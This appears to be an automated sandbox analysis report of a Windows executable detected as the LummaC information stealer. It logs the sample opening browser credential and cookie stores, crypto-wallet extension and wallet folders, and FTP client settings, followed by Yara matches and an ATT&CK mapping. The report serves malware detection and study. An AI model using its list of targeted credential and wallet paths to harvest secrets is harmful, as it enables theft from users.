Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\AIXACVYBSB	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\PSAMNLJHZW	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\AFWAAFRXKO	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\KZWFNRXYKI	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\SQRKHNBNYN	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\MNULNCRIYC	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\NHPKIZUUSG	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\NIKHQAIQAU	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior
Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe	Directory queried: C:\Users\user\Documents\QVTVNIBKSD	Jump to behavior

Source: C:\Users\user\Desktop\OtHVIQ2ge4.exe

Directory queried: number of queries: 1001

Source: Yara match	File source: 00000000.00000003.1490834833.000000000170A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1490653917.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1515231364.00000000016E9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OtHVIQ2ge4.exe PID: 7832, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: OtHVIQ2ge4.exe PID: 7832, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	2 Process Injection	34 Virtualization/Sandbox Evasion	2 OS Credential Dumping	751 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	2 Process Injection	LSASS Memory	34 Virtualization/Sandbox Evasion	Remote Desktop Protocol	41 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	223 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
OtHVIQ2ge4.exe	55%	ReversingLabs	Win32.Infostealer.Tinba
